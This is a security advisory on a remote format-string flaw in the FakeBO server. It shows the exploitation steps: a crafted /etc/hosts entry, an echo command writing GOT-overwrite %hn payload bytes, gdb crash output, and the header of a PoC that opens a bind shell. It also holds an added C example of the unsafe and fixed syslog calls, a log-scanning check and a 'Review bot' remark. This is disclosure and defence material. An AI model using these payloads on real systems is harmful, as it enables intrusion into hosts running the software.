http://www.secnetops.biz/research
Secure Network Operations, Inc. http://www.secnetops.com
Strategic Reconnaissance Team [EMAIL PROTECTED]
Team Lead Contact [EMAIL PROTECTED]
Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.
Quick Summary:
************************************************************************
Advisory Number : SRT2003-06-12-1212
Product : FakeBO server
Version : <= 0.4.1
Vendor : http://sourceforge.net/projects/fakebo/
Class : Remote
Criticality : Low
Operating System(s) : *nix, cygwin
High Level Explanation
************************************************************************
High Level Description : Remote format string issue in syslogprintf()
What to do : Apply patch or disable syslog in the config
Technical Details
************************************************************************
Proof Of Concept Status : Secure Network Operations does have PoC code
Low Level Description :
FakeBO could be considered a novelty program by now; however, in some
situations it could be used in some sort of novice honeypot-type setup.
It is also possible someone would think it was a good way to trick their
office buddy who had installed the REAL BO on their PC earlier that week.
Someone mentioned the possibility of its being used in a crude backdoor
as well.
Both Cygwin binaries and Unix source are available from the FakeBO website
located at http://cvs.linux.hr/fakebo/. This issue can be triggered in
both the Linux and Win32 versions. To be exploitable, FakeBO must first be
configured to use syslog() and the target must have the proper resolver
library in place. Syslog can be turned on in fakebo.conf as follows.
# you can set this to 1 if you want to log connections via syslog
# 0 - do not log via syslog
# 1 - log via syslog
# 2 - log via syslog verbosely
logtosyslog 1
Due to possible resolver issues, the chances of this bug being actively
exploited are slim. The issues with the resolver are explained at
http://pi.cr.yp.to/ and http://cr.yp.to/djbdns/idn.html. If your BIND
allows the allow_special all option, or options no-check-names is set in
/etc/resolv.conf, you may be exploitable. To show the possibility of
exploitation we simply use /etc/hosts as an example.
This is the entry in /etc/hosts:
127.0.0.1 ..AAAABBBB%10$x%11$x
If we only make use of the console we would see this:
04-09-2003 15:37:18 [NB] Connection[#0] from `..AAAABBBB%10$x%11$x'
(127.0.0.1) accepted!
In syslog, however, we get more interesting output:
Apr 9 15:37:18 vegeta FakeBO:
[NB] Connection[#0] from `..AAAABBBB4141414142424242' (127.0.0.1)
This is an example of overwriting the syslog() GOT entry (the
R_386_JUMP_SLOT shown below) in order to exploit this issue.
[EMAIL PROTECTED] dotslash]$ objdump -R fakebo-0.4.1/fakebo|grep syslog
08051cd4 R_386_JUMP_SLOT syslog
[EMAIL PROTECTED] dotslash]# echo -e "127.0.0.1 ..\xd6\x1c\x05\x08\xd4\x1c\x05\x08%10\$hn%11\$hn" > /etc/hosts
(gdb) r -c /tmp/fakebo.conf
Starting program: ~/fakebo-0.4.1/fakebo -c /tmp/fakebo.conf
FakeBO version 0.4.1 Copyright (C) 1998,99 by KoSt
Type `~/fakebo-0.4.1/fakebo -a' for details.
04-09-2003 19:48:06 FakeBO 0.4.1 started using PID 2591.
04-09-2003 19:48:25 [NB] Connection[#0] from `..??%10$hn%11$hn'
(127.0.0.1) accepted!
04-09-2003 19:48:43 [NB][#0] Client disconnected.
Program received signal SIGSEGV, Segmentation fault.
0x00240024 in ?? ()
If you wanted to take this simple example to the extreme...
[EMAIL PROTECTED] dotslash]$ head 0x82-fakebo_sux.c
/*
** FakeBO v0.4.1 Proof of Concept exploit
** exploit by "you dong-hun"(Xpl017Elz), <[EMAIL PROTECTED]>.
**
** bash-2.04# ./0x82-fakebo_sux -t1
** [1] Make format string code.
** [2] Try localhost NetBUS port.
** [3] Make bind shellcode.
** [+] Waiting, execute shell.
** [*] Executed shell successfully !
**
** Linux testsub 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
** uid=99(nobody) gid=99(nobody) groups=0(root),1(bin),2(daemon),3(sys),
** 4(adm),6(disk),10(wheel)
** bash-2.04$
**
*/
When being attacked, you would see the following in syslog:
** 05-31-2003 18:48:55 FakeBO 0.4.1 started using PID 6996.
** 05-31-2003 18:49:05 [NB] Connection[#0] from `ln%49115x%16$hn%6019x%15$hn'
(127.0.0.1) accepted!
** 05-31-2003 18:49:06 [NB](#0): @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...
If, however, you were using an Immunix box (http://www.immunix.org), you
would see the following:
[EMAIL PROTECTED] kf]# ./0x82-fakebo_sux -t1
[1] Make format string code.
[2] Try localhost NetBUS port.
[3] Make bind shellcode.
Broken pipe
Note that we did not get a shell: that is FormatGuard working its magic.
fakebo[6467]: ImmunixOS format error - mismatch of 0 in syslog() called by
syslogprintf.
Cheers go to the Immunix team for their work on the FormatGuard product.
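To make the bug pattern and its fix concrete, here is an added example written for this advisory's readers; it is neither FakeBO's code nor the advisory author's PoC. It assumes that FakeBO assembles the connection message into a buffer and then hands that buffer to syslog(); a variadic fake_syslog() backed by vsnprintf() stands in for syslog(3) so the example runs without a syslog daemon, and all function and variable names are the example's own. Beside the unsafe and patched call styles it carries a check that flags connection records whose hostname field contains characters that cannot occur in a hostname, the kind of thing an administrator who cannot patch right away could run over FakeBO's logs:

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Stand-in for syslog(3): same (format, ...) shape, but writes to a buffer
 * so the example runs offline. Assumption of this example, not FakeBO code. */
static int fake_syslog(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    int r;
    va_start(ap, fmt);
    r = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return r;
}

/* Assemble the banner in the shape the advisory's output shows. */
static void build_banner(char *buf, size_t n, int conn,
                         const char *host, const char *ip)
{
    snprintf(buf, n, "[NB] Connection[#%d] from `%s' (%s) accepted!",
             conn, host, ip);
}

/* VULNERABLE call style, mirroring the pre-patch syslog(LOG_WARNING, buf):
 * the message, which embeds the reverse-DNS name the peer controls, is
 * itself the format string. Only exercise it with benign input; "%x"/"%n"
 * in host is undefined behaviour, which is exactly the advisory's bug. */
int log_connection_unsafe(const char *host, char *out, size_t n)
{
    char buf[256];
    build_banner(buf, sizeof buf, 0, host, "127.0.0.1");
    return fake_syslog(out, n, buf);          /* BUG: buf is the format */
}

/* FIXED call style, mirroring the patch's syslog(LOG_WARNING, "%s", buf):
 * the message is an ordinary string argument and is copied verbatim. */
int log_connection_safe(const char *host, char *out, size_t n)
{
    char buf[256];
    build_banner(buf, sizeof buf, 0, host, "127.0.0.1");
    return fake_syslog(out, n, "%s", buf);
}

/* Character check for a reverse-lookup result: RFC 1123 hostnames use only
 * letters, digits, '-' and '.'; a '%' or '$' in the name never belongs. */
int hostname_is_clean(const char *host)
{
    for (; *host; host++)
        if (!isalnum((unsigned char)*host) && *host != '-' && *host != '.')
            return 0;
    return 1;
}

/* Inspect one FakeBO connection record. Copies the backtick-quoted name into
 * host and returns 1 if it contains characters foreign to a hostname, 0 if
 * it is clean, -1 if the line carries no quoted hostname. */
int scan_log_line(const char *line, char *host, size_t n)
{
    const char *start = strchr(line, '`');
    const char *end;
    size_t len;

    if (n > 0)
        host[0] = '\0';
    if (start == NULL)
        return -1;
    start++;
    end = strchr(start, '\'');
    if (end == NULL)
        return -1;
    len = (size_t)(end - start);
    if (len >= n)
        len = n - 1;
    memcpy(host, start, len);
    host[len] = '\0';
    return hostname_is_clean(host) ? 0 : 1;
}

int main(void)
{
    /* Sample records: the first three are taken from the advisory's own
     * console and syslog output, the fourth is a constructed benign one. */
    static const char *samples[] = {
        "04-09-2003 15:37:18 [NB] Connection[#0] from `..AAAABBBB%10$x%11$x' (127.0.0.1) accepted!",
        "Apr 9 15:37:18 vegeta FakeBO: [NB] Connection[#0] from `..AAAABBBB4141414142424242' (127.0.0.1)",
        "05-31-2003 18:49:05 [NB] Connection[#0] from `ln%49115x%16$hn%6019x%15$hn' (127.0.0.1) accepted!",
        "05-31-2003 18:50:00 [NB] Connection[#1] from `host-1.example.net' (10.0.0.5) accepted!",
    };
    char host[128], out[256];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int r = scan_log_line(samples[i], host, sizeof host);
        printf("%-10s %s\n", r == 1 ? "SUSPICIOUS" : r == 0 ? "ok" : "skip", host);
    }

    /* "%%" is the one directive defined with no arguments, so it shows the
     * two call styles diverging without undefined behaviour. */
    log_connection_unsafe("50%%off", out, sizeof out);
    printf("unsafe: %s\n", out);   /* hostname field becomes `50%off' */
    log_connection_safe("50%%off", out, sizeof out);
    printf("safe:   %s\n", out);   /* hostname field stays `50%%off' */
    return 0;
}
```

Note which records the check catches: the console line and the `ln%49115x...' syslog line still carry the raw directives and are flagged, but the syslog record from the first demonstration reads `..AAAABBBB4141414142424242', the directives having already been consumed by the vulnerable call, and passes as clean. Inspect the name before it is formatted, or the console log, rather than only what reached syslog.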
Patch or Workaround:
Shortly after exploiting this issue on a non-Immunix system I looked around
to make sure this had not already been published. It turns out that someone
on the FreeBSD team also noticed this sometime last year and wrote a patch.
Fri Jun 7 01:16:21 2002 UTC (12 months ago) by kris
- Fix a format string vulnerability which appears to be exploitable, and
bump PORTREVISION.
--- misc.c.orig Thu Jun 6 18:11:32 2002
+++ misc.c Thu Jun 6 18:11:41 2002
@@ -107,7 +107,7 @@
#ifdef HAVE_OPENLOG
openlog("FakeBO", LOG_CONS, LOG_USER);
- syslog(LOG_WARNING, buf);
+ syslog(LOG_WARNING, "%s", buf);
closelog();
#else
#warning "Can't find usable syslog, disabled!"
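Review bot: The one-line change is the right fix: buf holds the assembled message, including the reverse-DNS name the remote peer controls, and passing it as syslog()'s format argument lets directives in that name drive the format parser (the %10$x/%11$x and $hn demonstrations above), whereas syslog(LOG_WARNING, "%s", buf); makes it an ordinary string argument. Two things to confirm: that buf is not handed as a format string to any other sink inside syslogprintf(), since the hunk only shows the HAVE_OPENLOG branch and the first line of the #else branch; and that the hunk as reproduced here is complete, because the header announces 7 lines on each side but only 6 are shown, so one trailing context line (most likely the closing #endif) appears to have been lost in transit.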
Vendor Status : Vlatko Kosturjak aka KoSt was notified about the issue;
no updates to the SourceForge site or original home page have been made.
A recompiled Cygwin binary is not available from the author at this time.
Bugtraq URL : to be assigned
------------------------------------------------------------------------
This advisory was released by Secure Network Operations, Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact [EMAIL PROTECTED] for information on how
to obtain exploit information.